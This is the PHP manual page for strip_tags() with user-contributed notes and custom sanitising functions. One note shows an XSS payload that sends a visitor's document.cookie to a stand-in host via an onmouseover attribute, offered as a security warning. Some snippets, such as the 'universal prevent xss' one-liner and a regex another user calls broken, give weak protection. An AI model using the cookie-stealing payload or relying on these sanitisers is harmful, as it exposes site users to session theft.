strip_tags

(PHP 4, PHP 5, PHP 7)

strip_tags — Strip HTML and PHP tags from a string

Description

string strip_tags ( string $str [, string $allowable_tags ] )

This function tries to return a string with all NULL bytes, HTML and PHP tags stripped from a given str. It uses the same tag stripping state machine as the fgetss() function.

Parameters

str: The input string.
allowable_tags: You can use the optional second parameter to specify tags which should not be stripped.

Note:
HTML comments and PHP tags are also stripped. This is hardcoded and can not be changed with allowable_tags.

Note:
In PHP 5.3.4 and later, self-closing XHTML tags are ignored and only non-self-closing tags should be used in allowable_tags. For example, to allow both <br> and <br/>, you should use:

<?php strip_tags($input, '<br>'); ?>
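As a rough illustration of the note above, listing only <br> keeps every spelling of the line break while other tags are still removed. The input string and the <hr> tag are made up for this sketch, and the behaviour shown assumes PHP 5.3.4 or later.

```php
<?php
// Hypothetical input mixing three spellings of the same tag plus a disallowed one.
$input = '<br>Each<br/>New<br />Line<hr>';

// Only the non-self-closing form is listed in allowable_tags.
$clean = strip_tags($input, '<br>');

echo $clean, "\n"; // <br>Each<br/>New<br />Line
```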

Return Values

Returns the stripped string.

Changelog

Version	Description
5.3.4	strip_tags() ignores self-closing XHTML tags in allowable_tags.
5.0.0	strip_tags() is now binary safe.

Examples

Example #1 strip_tags() example


<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text);
echo "\n";

// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>

The above example will output:

Test paragraph. Other text
<p>Test paragraph.</p> <a href="#fragment">Other text</a>

Notes

Warning

Because strip_tags() does not actually validate the HTML, partial or broken tags can result in the removal of more text/data than expected.
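A small sketch of how this can bite: a bare "<" directly followed by a character is treated as the start of a tag, so the text after it can disappear. The helper escape_stray_lt() below is a hypothetical name, not part of PHP. It escapes any "<" that does not look like the start of a tag, closing tag, comment or processing instruction before strip_tags() runs. Treat it as one possible workaround, not a validator.

```php
<?php
// Hypothetical helper: turn a "<" that cannot start a tag into &lt;.
function escape_stray_lt($str)
{
    // "<" not followed by a letter, "/", "!" or "?" is assumed to be plain text.
    return preg_replace('/<(?![a-zA-Z\/!?])/', '&lt;', $str);
}

// Without the helper, the text after "<5" is swallowed as if it were a tag.
$broken = strip_tags('1 <5 and more');

// With the helper, the comparison survives and real tags are still stripped.
$fixed = strip_tags(escape_stray_lt('1 <5 and <b>more</b>'));

echo $fixed, "\n"; // 1 &lt;5 and more
```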

Warning

This function does not modify any attributes on the tags that you allow using allowable_tags, including the style and onmouseover attributes that a mischievous user may abuse when posting text that will be shown to other users.
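To make the warning concrete, the following sketch uses a made-up comment string and a made-up handler name, steal(). It shows that an allowed tag comes back with its attributes untouched. When no markup is needed at all, stripping every tag and then escaping with htmlspecialchars() is one conservative alternative.

```php
<?php
// Hypothetical user-supplied comment with an event-handler attribute.
$comment = '<p onmouseover="steal()">Tom & Jerry</p>';

// Allowing <p> keeps the whole opening tag, attribute included.
$kept = strip_tags($comment, '<p>');

// Stripping everything and escaping the remainder leaves plain, inert text.
$plain = htmlspecialchars(strip_tags($comment), ENT_QUOTES, 'UTF-8');

echo $kept, "\n";  // <p onmouseover="steal()">Tom & Jerry</p>
echo $plain, "\n"; // Tom &amp; Jerry
```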

Note:
Tag names within the input HTML that are greater than 1023 bytes in length will be treated as though they are invalid, regardless of the allowable_tags parameter.

User Contributed Notes

Kenji

2 years ago


A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you are introducing with such code! Don't use it; stay safe.

mariusz.tarnaski at wp dot pl

7 years ago


Hi. I made a function that removes the HTML tags along with their contents:



Function:

<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {
  preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
  $tags = array_unique($tags[1]);

  if(is_array($tags) AND count($tags) > 0) {
    if($invert == FALSE) {
      return preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    else {
      return preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
    }
  }
  elseif($invert == FALSE) {
    return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
  }
  return $text;
}
?>



Sample text:

$text = '<b>sample</b> text with <div>tags</div>';



Result for strip_tags($text):

sample text with tags



Result for strip_tags_content($text):

 text with 



Result for strip_tags_content($text, '<b>'):

<b>sample</b> text with 



Result for strip_tags_content($text, '<b>', TRUE);

 text with <div>tags</div>



I hope someone finds this useful :)

CEO at CarPool2Camp dot org

7 years ago


Note the different outputs from different versions of the same tag:



<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br>');
var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"
?>

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"
?>

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>

doug at exploittheweb dot com

8 months ago


"5.3.4    strip_tags() no longer strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags."

This is poorly worded.

The above seems to be saying that, since 5.3.4, if you don't specify "<br/>" in allowable_tags then "<br/>" will not be stripped... but that's not actually what they're trying to say.

What it means is, in versions prior to 5.3.4, it "strips self-closing XHTML tags unless the self-closing XHTML tag is also given in allowable_tags", and that since 5.3.4 this is no longer the case.

So what reads as "no longer strips self-closing tags (unless the self-closing XHTML tag is also given in allowable_tags)" is actually saying "no longer (strips self-closing tags unless the self-closing XHTML tag is also given in allowable_tags)".

i.e.

pre-5.3.4: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br>' // strips <br/> because it wasn't explicitly specified in allowable_tags

5.3.4 and later: strip_tags('Hello World<br><br/>','<br>') => 'Hello World<br><br/>' // does not strip <br/> because PHP matches it with <br> in allowable_tags

Trititaty

4 months ago


Features:
* allowable tags (as in strip_tags),
* optional stripping attributes of the allowable tags,
* optional comment preserving,
* deleting broken and unclosed tags and comments,
* optional callback function call for every piece processed allowing for flexible replacements.

<?php
function better_strip_tags( $str, $allowable_tags = '', $strip_attrs = false, $preserve_comments = false, callable $callback = null ) {
  $allowable_tags = array_map( 'strtolower', array_filter( // lowercase
      preg_split( '/(?:>|^)\\s*(?:<|$)/', $allowable_tags, -1, PREG_SPLIT_NO_EMPTY ), // get tag names
      function( $tag ) { return preg_match( '/^[a-z][a-z0-9_]*$/i', $tag ); } // filter broken
  ) );
  $comments_and_stuff = preg_split( '/(<!--.*?(?:-->|$))/', $str, -1, PREG_SPLIT_DELIM_CAPTURE );
  foreach ( $comments_and_stuff as $i => $comment_or_stuff ) {
    if ( $i % 2 ) { // html comment
      if ( !( $preserve_comments && preg_match( '/<!--.*?-->/', $comment_or_stuff ) ) ) {
        $comments_and_stuff[$i] = '';
      }
    } else { // stuff between comments
      $tags_and_text = preg_split( "/(<(?:[^>\"']++|\"[^\"]*+(?:\"|$)|'[^']*+(?:'|$))*(?:>|$))/", $comment_or_stuff, -1, PREG_SPLIT_DELIM_CAPTURE );
      foreach ( $tags_and_text as $j => $tag_or_text ) {
        $is_broken = false;
        $is_allowable = true;
        $result = $tag_or_text;
        if ( $j % 2 ) { // tag
          if ( preg_match( "%^(</?)([a-z][a-z0-9_]*)\\b(?:[^>\"'/]++|/+?|\"[^\"]*\"|'[^']*')*?(/?>)%i", $tag_or_text, $matches ) ) {
            $tag = strtolower( $matches[2] );
            if ( in_array( $tag, $allowable_tags ) ) {
              if ( $strip_attrs ) {
                $opening = $matches[1];
                $closing = ( $opening === '</' ) ? '>' : $matches[3]; // keep the original '>' or '/>' of an opening tag
                $result = $opening . $tag . $closing;
              }
            } else {
              $is_allowable = false;
              $result = '';
            }
          } else {
            $is_broken = true;
            $result = '';
          }
        } else { // text
          $tag = false;
        }
        if ( !$is_broken && isset( $callback ) ) {
          // allow result modification
          call_user_func_array( $callback, array( &$result, $tag_or_text, $tag, $is_allowable ) );
        }
        $tags_and_text[$j] = $result;
      }
      $comments_and_stuff[$i] = implode( '', $tags_and_text );
    }
  }
  $str = implode( '', $comments_and_stuff );
  return $str;
}
?>

Callback arguments:
* &$result: contains the text to be placed instead of the original piece (e.g. an empty string for forbidden tags); it can be changed;
* $tag_or_text: original piece of text or a tag (see below);
* $tag: false for text between tags, lowercase tag name for tags;
* $is_allowable: boolean telling whether a tag is allowed (to avoid double checking), always true for text between tags.
The callback function isn't called for comments and broken tags.

Caution: the function doesn't fully validate tags (let alone the HTML itself); it just forcibly strips those that are obviously broken (in addition to stripping forbidden tags). If you want to get valid tags, use the strip_attrs option, though it doesn't guarantee that tags are balanced or used in the appropriate context. For complex logic, consider using a DOM parser.

bzplan at web dot de

3 years ago


a HTML code like this: 

<?php
$html = '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
'; 
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood'; 

notice: the words 'blue' and 'size' grow together :( 
and line-breaks are still in new string $str

if you need a space between the words (and without line-break) 
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood'; 

the function: 

<?php
// -------------------------------------------------------------- 

function rip_tags($string) { 
    
    // ----- remove HTML TAGs ----- 
    $string = preg_replace ('/<[^>]*>/', ' ', $string); 
    
    // ----- remove control characters ----- 
    $string = str_replace("\r", '', $string);    // --- remove carriage returns
    $string = str_replace("\n", ' ', $string);   // --- replace with space
    $string = str_replace("\t", ' ', $string);   // --- replace with space
    
    // ----- remove multiple spaces ----- 
    $string = trim(preg_replace('/ {2,}/', ' ', $string));
    
    return $string; 

}

// -------------------------------------------------------------- 
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags() 
... then remove control characters and multiple spaces
:)

Dr. Gianluigi "Zane" Zanettini

6 months ago


A word of caution. strip_tags() can actually be used for input validation as long as you remove ANY tag. As soon as you accept a single tag (2nd parameter), you are opening up a security hole such as this:

<acceptedTag onLoad="javascript:malicious()" />

Plus: regexing away attributes or code block is really not the right solution. For effective input validation when using strip_tags() with even a single tag accepted, http://htmlpurifier.org/ is the way to go.

obeyer at popsugar dot com

2 years ago


actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped

bnt dot gloria at outlook dot com

1 year ago


With allowable_tags, strip_tags() is not safe.

<?php

$str= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo $str; // DISPLAY: <p onmouseover="window.location='http://www.theBad.com/?cookie='+document.cookie;"> don't mouseover </p>

?>

cesar at nixar dot org

10 years ago


Here is a recursive function for strip_tags, like the one shown on the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return is_array($value) ?
    array_map('strip_tags_deep', $value) :
    strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>

tom at cowin dot us

5 years ago


With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it... 



<?php
    function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')
    {
        mb_regex_encoding('UTF-8');

        //replace MS special characters first
        $search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');
        $replace = array('\'', '\'', '"', '"', '-');
        $text = preg_replace($search, $replace, $text);

        //make sure _all_ html entities are converted to the plain ascii equivalents - it appears
        //in some MS headers, some html entities are encoded and some aren't
        $text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');

        //try to strip out any C style comments first, since these, embedded in html comments, seem to
        //prevent strip_tags from removing html comments (MS Word introduced combination)
        if(mb_stripos($text, '/*') !== FALSE){
            //mb_ereg patterns take no delimiters; the 'm' option lets '.' match newlines
            $text = mb_eregi_replace('/\*.*?\*/', '', $text, 'm');
        }

        //introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be stripped:
        //'<1' becomes '< 1' (note: somewhat application specific)
        $text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
        $text = strip_tags($text, $allowed_tags);

        //eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
        $text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);

        //strip out inline css and simplify style tags
        $search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
        $replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
        $text = preg_replace($search, $replace, $text);

        //on some of the newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
        //some MS Style Definitions - this last bit gets rid of any leftover comments
        $num_matches = preg_match_all("/\<!--/u", $text, $matches);
        if($num_matches){
              $text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
        }
        return $text;
    }
?>

sERGE-01

2 years ago


Fix for my Example2. 
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
    $out_text = "";
    $ofs = 0;
    if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        foreach($matches[0] as $tag)
        {
            $out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
            $out_text .= $tag[0];
            $ofs = $tag[1] + strlen($tag[0]);
        }
    }
    $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>

valentin dot boschatel at evalandgo dot com

11 months ago


Hi,

I have a problem with this function. I want to use the < symbol in my text, but it doesn't work when a character directly follows the symbol.

Example:
<?php
$test = '<p><span style="color: #ff0000; background-color: #000000;">Complex</span> <span style="font-family: impact,chicago;">text <50% </span> <a href="http://exempledomain.com/"><em>with</em></a> <span style="font-size: 36pt;"><strong>tags</strong></span></p>';

echo strip_tags($test);
// Outputs : Complex text
?>

I made a function for this :

Function: 
<?php
function strip_tags_review($str, $allowable_tags = '') {

    preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($allowable_tags), $tags);
    $tags = array_unique($tags[1]);

    if(is_array($tags) AND count($tags) > 0) {
        $pattern = '@<(?!(?:' . implode('|', $tags) . ')\b)(\w+)\b.*?>(.*?)</\1>@i';
    }
    else {
        $pattern = '@<(\w+)\b.*?>(.*?)</\1>@i';
    }

    $str = preg_replace($pattern, '$2', $str);
    return preg_match($pattern, $str) ? strip_tags_review($str, $allowable_tags) : $str;
}

echo strip_tags_review($test);
// Outputs: Complex text <50%  with tags

echo strip_tags_review($test, '<a>');
// Outputs: Complex text <50%  <a href="http://exempledomain.com">with</a> tags
?>

mshaffer

2 years ago


Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags destroys the whole HTML behind the tags with invalid attributes. Like <img src="/images/image.jpg""> (look, there is an odd quote before >.) 

So I wrote function which fixes unsafe attributes and replaces odd " and ' quotes with &quot; and &#39;. 

<?php 
function fix_unsafe_attributes($s) { 
  $out = false; 
  while (preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins 
    $i = $i[1][1]+1; 
    $out.= substr($s, 0, $i); 
    $s = substr($s, $i); 

    // scan attributes and find odd " and ' 
    while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) && 
           (($i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) && 
           ((($c = strpos($s, '>')) === false) || ($i < $c))) { 

      $c = $s[$i]; 
      if (($i < 1) || ($s[$i-1] != '=')) { 
        $out.= substr($s, 0, $i).($s[$i] == '"' ? '&quot;' : '&#39;'); // replace odd " and ' 
        $s = substr($s, $i+1); 
      }else { 
        $i++; 
        $out.= substr($s, 0, $i); 
        $s = substr($s, $i); 

        if (($i = strpos($s, $c)) !== false) { 
          $i++; 
          $out.= substr($s, 0, $i); 
          $s = substr($s, $i); 
        } 
      } 
    } 
  } 
  return $out.$s; 
} 
?> 

Maybe this function can be rewritten with a simple regular expression, but I had no luck doing so quickly.

pietro777

1 year ago


$data = '<br>Each<br/>New<br />Line'; 
$new  = strip_tags($data, '<br />||<br/>||<br>'); 
var_dump($new); // OUTPUTS string(11) "<br>Each<br/>New<br />Line"

sERGE-01

2 years ago


My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
    $tags_allowed = "a|b|i|s|u|br";
    $in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";
    
    $out_text = preg_replace('#</?(?!('.$tags_allowed.'))\b([^><]*>)#sim', "", $in_text);
    
    print "Example 1:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example keeps all allowed tags and escapes the rest of the text with the htmlentities() function:
<?php
    // getting all of allowed tags with their offset
    if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        $out_text = "";
        $ofs = 0;
        foreach($matches[0] as $tag)
        {
            // text before allowed tag
            $out_text .= htmlentities(substr($in_text,$ofs,$tag[1]-$ofs), ENT_NOQUOTES, "cp1251"); 
            $out_text .= $tag[0]; // next allowed tag
            $ofs = $tag[1] + strlen($tag[0]);
        }
        // adding end of text
        $out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); 
    }

    print "Example 2:<br>";
    print htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------

denis dot for dot spam at gmail dot com

5 months ago


My function removes specific tags together with their content, and can also target elements that carry particular attributes:
<?php
function strip_selected_tags_content( $text, $tags = array() ) {
    foreach ( $tags as $key => $val ) {
        if ( ! is_array( $val ) ) {
            $text = preg_replace( '/<' . $val . '[^>]*>([\s\S]*?)<\/' . $val . '[^>]*>/', '', $text );
        } else {
            $text = preg_replace( '/<' . $val[0] . ' ' . $val[1] . '[^>]*>([\s\S]*?)<\/' . $val[0] . '[^>]*>/', '', $text );
        }
    }
    return $text;
}
?>
example:
<?php
$clear = array('social',
            'script',
            'noindex',
            'time',
            'header',
            array( 'div', 'class="tags"' ),
            array( 'div', 'class="box_comments"' ),
            array( 'p', 'class="form-submit"' ),
            array( 'div', 'class="comment-form-comment"' )
            );
$text = '<preheader>image article</preheader>
<header>nnnnn</header>
<social>fb code, google code etc...</social>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
<div class="tags">true code, that code</div>
<div class="comment-form-comment"> coment form on blog</div>
';
echo strip_selected_tags_content($text, $clear);
?>
output:
<?php
<preheader>image article</preheader>
etc....
<p class="text">
bla-bla bla-blabla-bla bla-blabla-bla bla-bla
</p>
<div>sdasda</div>
?>

andy

2 years ago


<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>
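One caveat with the snippet above: request parameters can themselves be arrays (for example ?tags[]=a&tags[]=b), and array_map("strip_tags", ...) does not descend into them. A minimal recursive sketch follows; strip_tags_recursive() and the $request array are hypothetical names standing in for real input. Stripping tags on input is also not a substitute for escaping on output, so treat this as a partial measure at best.

```php
<?php
// Hypothetical helper: apply strip_tags() to every string in a nested array.
function strip_tags_recursive($value)
{
    if (is_array($value)) {
        return array_map('strip_tags_recursive', $value);
    }
    // Leave non-string scalars (ints, bools, null) untouched.
    return is_string($value) ? strip_tags($value) : $value;
}

// Stand-in for $_GET or $_POST with one nested parameter.
$request = array(
    'name' => '<b>Ann</b>',
    'tags' => array('<i>x</i>', 'y'),
);

$clean = strip_tags_recursive($request);
print_r($clean);
```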

salavert at~ akelos

10 years ago


<?php
       /**
    * Works like PHP function strip_tags, but it only removes selected tags.
    * Example:
    *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
    */

    function strip_selected_tags($text, $tags = array())
    {
        $args = func_get_args();
        $text = array_shift($args);
        $tags = func_num_args() > 2 ? array_diff($args,array($text))  : (array)$tags;
        foreach ($tags as $tag){
            if(preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
                $text = str_replace($found[0],$found[1],$text);
          }
        }

        return $text;
    }

?>

Hope you find it useful,

Jose Salavert

kai at froghh dot de

7 years ago


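A function that decides whether < is the start of a tag or a less-than / less-than-or-equal sign:

<?php
function lt_replace($str){
    // escape "<" unless it is followed by a letter or by "/", "!" or "?" (closing tags, comments, PHP tags)
    return preg_replace("/<([^[:alpha:]\/!?])/", '&lt;\\1', $str);
}
?>

It's meant to be used before strip_tags().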

fernando at zauber dot es

1 year ago


As you probably know, the native function strip_tags doesn't work very well with malformed HTML when you use the allowed tags parameter.
This is a very simple but effective function to remove html tags. It takes a list (array) of allowed tags as second parameter:

<?php
function flame_strip_tags($html, $allowed_tags=array()) {
  $allowed_tags=array_map('strtolower',$allowed_tags);
  $rhtml=preg_replace_callback('/<\/?([^>\s]+)[^>]*>/i', function ($matches) use (&$allowed_tags) {        
    return in_array(strtolower($matches[1]),$allowed_tags)?$matches[0]:'';
  },$html);
  return $rhtml;
}
?>

The function works reasonably well with invalid or badly formatted HTML.

Use:

<?php
$allowed_tags=array("h1","a");
$html=<<<EOD
<h1>Example</h1>
<dt><a href='/manual/en/getting-started.php'>Getting Started</a></dt>
    <dd><a href='/manual/en/introduction.php'>Introduction</a></dd>
    <dd><a href='/manual/en/tutorial.php'>A simple tutorial</a></dd>
<dt><a href='/manual/en/langref.php'>Language Reference</a></dt>
    <dd><a href='/manual/en/language.basic-syntax.php'>Basic syntax</a></dd>
    <dd><a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a></dd>
</dl>
EOD;
echo flame_strip_tags($html,$allowed_tags);
?>

The output will be:

<h1>Example</h1>
<a href='/manual/en/getting-started.php'>Getting Started</a>
<a href='/manual/en/introduction.php'>Introduction</a>
<a href='/manual/en/tutorial.php'>A simple tutorial</a>
<a href='/manual/en/langref.php'>Language Reference</a>
<a href='/manual/en/language.basic-syntax.php'>Basic syntax</a>
<a href='/manual/en/reserved.interfaces.php'>Predefined Interfaces and Classes</a>

brettz9 AAT yah

7 years ago


Works on shortened <?...?> syntax and thus also will remove XML processing instructions.

admin at automapit dot com

9 years ago


<?php
function html2txt($document){
$search = array('@<script[^>]*?>.*?</script>@si',  // Strip out javascript
               '@<[\/\!]*?[^<>]*?>@si',            // Strip out HTML tags
               '@<style[^>]*?>.*?</style>@siU',    // Strip style tags properly
               '@<![\s\S]*?--[ \t\n\r]*>@'         // Strip multi-line comments including CDATA
);
$text = preg_replace($search, '', $document);
return $text;
}
?>



This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in its way.



It's a frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
